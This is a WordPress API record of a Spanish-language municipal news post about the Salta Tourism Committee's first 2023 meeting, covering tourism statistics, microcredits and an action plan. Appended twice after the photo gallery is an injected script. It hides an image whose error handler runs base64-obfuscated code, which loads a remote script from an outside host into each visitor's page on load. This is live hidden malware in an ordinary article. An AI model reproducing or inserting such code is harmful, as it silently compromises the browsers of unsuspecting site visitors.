{"id":2157,"date":"2023-02-01T11:33:07","date_gmt":"2023-02-01T14:33:07","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2157"},"modified":"2025-08-14T00:24:17","modified_gmt":"2025-08-14T03:24:17","slug":"el-municipio-llevo-adelante-la-primera-reunion-del-ano-del-comite-de-turismo-de-la-ciudad","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2157","title":{"rendered":"El municipio llev\u00f3 adelante la primera reuni\u00f3n del a\u00f1o del Comit\u00e9 de Turismo de la ciudad"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#b92348\"><strong><em>Durante el encuentro se trat\u00f3 el balance tur\u00edstico 2022 y el avance de lo que fue el primer mes del corriente. Adem\u00e1s, se analiz\u00f3 el calendario de acciones a desarrollar en este 2023, los programas de desarrollo y fortalecimiento para el sector con los que cuenta el municipio, entre otros temas.<\/em><\/strong><\/h4>\n\n\n\n<p>La Municipalidad de Salta realiz\u00f3, esta tarde, un nuevo encuentro con el Comit\u00e9 de Turismo, a fin de analizar el balance del 2.022, el avance y desarrollo del 2.023. La reuni\u00f3n tuvo lugar en la Secretar\u00eda de Cultura y Turismo \u201cCasa de Moldes\u201d, ubicada en calle Caseros 711.&nbsp;<\/p>\n\n\n\n<p>Durante la jornada, se present\u00f3 el balance estad\u00edstico de turismo relacionado a arribos, impacto econ\u00f3mico, ocupaci\u00f3n promedio y pernoctaciones. Adem\u00e1s, se mostr\u00f3 un informe aerocomercial del a\u00f1o pasado, la oferta de la ciudad y el avance del mes de enero 2.023.&nbsp;<\/p>\n\n\n\n<p>Asimismo, se tuvo en cuenta la gesti\u00f3n que lleva adelante la Municipalidad con respecto a los Microcr\u00e9ditos Tur\u00edsticos, haciendo hincapi\u00e9 en los objetivos del programa para mejorar un emprendimiento y obtener herramientas de difusi\u00f3n y promoci\u00f3n del producto.&nbsp;<\/p>\n\n\n\n<p>Adem\u00e1s, en el encuentro, los integrantes coincidieron sobre el trabajo en materia de formaci\u00f3n, programas de desarrollo de la oferta tur\u00edstica, la se\u00f1al\u00e9tica y los pr\u00f3ximos eventos locales que se van a realizar en la ciudad.&nbsp; Por \u00faltimo, los presentes trataron el amplio cronograma de acciones que va a tener en cuenta el municipio durante el corriente a\u00f1o.<\/p>\n\n\n\n<p>Al respecto, Fernando Garc\u00eda Soria, secretario de Cultura y Turismo, afirm\u00f3: \u201cHoy tuvimos la primera reuni\u00f3n del Comit\u00e9 de Turismo de la ciudad de Salta, d\u00f3nde se hizo un balance de lo que fue el movimiento tur\u00edstico del a\u00f1o 2.022 y del primer mes del 2.023. Podemos decir que los resultados son alentadores, ya que marcan que el turismo sigue su proceso de recuperaci\u00f3n\u201d.&nbsp;<\/p>\n\n\n\n<p>\u201cSe present\u00f3, adem\u00e1s, el plan de acci\u00f3n 2.023 con los tres ejes de gesti\u00f3n que plante\u00f3 la intendenta, Bettina Romero, de llevar adelante un desarrollo tur\u00edstico en la ciudad acorde a las necesidades que est\u00e1 teniendo el sector. Tratamos, a su vez, un fuerte plan de promoci\u00f3n para darle continuidad a las actividades que se vienen desarrollando para el turismo de la ciudad\u201d, finaliz\u00f3 el funcionario.&nbsp;<\/p>\n\n\n\n<p>Participaron de la reuni\u00f3n, tambi\u00e9n, representando al municipio: el subsecretario de Turismo, Juan Manuel Contreras; la subsecretaria de Gesti\u00f3n, Emilia San\u00edn Mili\u00e1n y la directora General de Desarrollo de la Oferta y Productos, Julieta del Carpio.&nbsp;<\/p>\n\n\n\n<p>Por el sector privado, lo hicieron: la presidenta de la Asociaci\u00f3n de Hoteles de Turismo, Mariana Farjat; en representaci\u00f3n del Bureau Salta, Patricio Barbar\u00e1n; el presidente de la C\u00e1mara Gastron\u00f3mica y Hotelera, Juan Lucero y la presidenta de la Asociaci\u00f3n Salte\u00f1a de Agencias de Turismo, Lia Rivella.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"646\" data-id=\"2159\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/02\/whatsapp-image-2023-01-31-at-153152-1024x646.jpeg\" alt=\"\" class=\"wp-image-2159\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/02\/whatsapp-image-2023-01-31-at-153152-1024x646.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/02\/whatsapp-image-2023-01-31-at-153152-300x189.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/02\/whatsapp-image-2023-01-31-at-153152-768x484.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/02\/whatsapp-image-2023-01-31-at-153152-696x439.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/02\/whatsapp-image-2023-01-31-at-153152-1068x673.jpeg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/02\/whatsapp-image-2023-01-31-at-153152-666x420.jpeg 666w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/02\/whatsapp-image-2023-01-31-at-153152.jpeg 1280w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"702\" data-id=\"2158\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/02\/whatsapp-image-2023-01-31-at-153154-1024x702.jpeg\" alt=\"\" class=\"wp-image-2158\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/02\/whatsapp-image-2023-01-31-at-153154-1024x702.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/02\/whatsapp-image-2023-01-31-at-153154-300x206.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/02\/whatsapp-image-2023-01-31-at-153154-768x527.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/02\/whatsapp-image-2023-01-31-at-153154-218x150.jpeg 218w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/02\/whatsapp-image-2023-01-31-at-153154-696x477.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/02\/whatsapp-image-2023-01-31-at-153154-1068x733.jpeg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/02\/whatsapp-image-2023-01-31-at-153154-612x420.jpeg 612w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/02\/whatsapp-image-2023-01-31-at-153154-100x70.jpeg 100w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/02\/whatsapp-image-2023-01-31-at-153154.jpeg 1280w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Durante el encuentro se trat\u00f3 el balance tur\u00edstico 2022 y el avance de lo que fue el primer mes del corriente. Adem\u00e1s, se analiz\u00f3 el calendario de acciones a desarrollar en este 2023, los programas de desarrollo y fortalecimiento para el sector con los que cuenta el municipio, entre otros temas. La Municipalidad de Salta [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2159,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14],"tags":[],"class_list":{"0":"post-2157","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2157"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2157"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2157\/revisions"}],"predecessor-version":[{"id":7190,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2157\/revisions\/7190"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2159"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2157"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2157"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2157"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}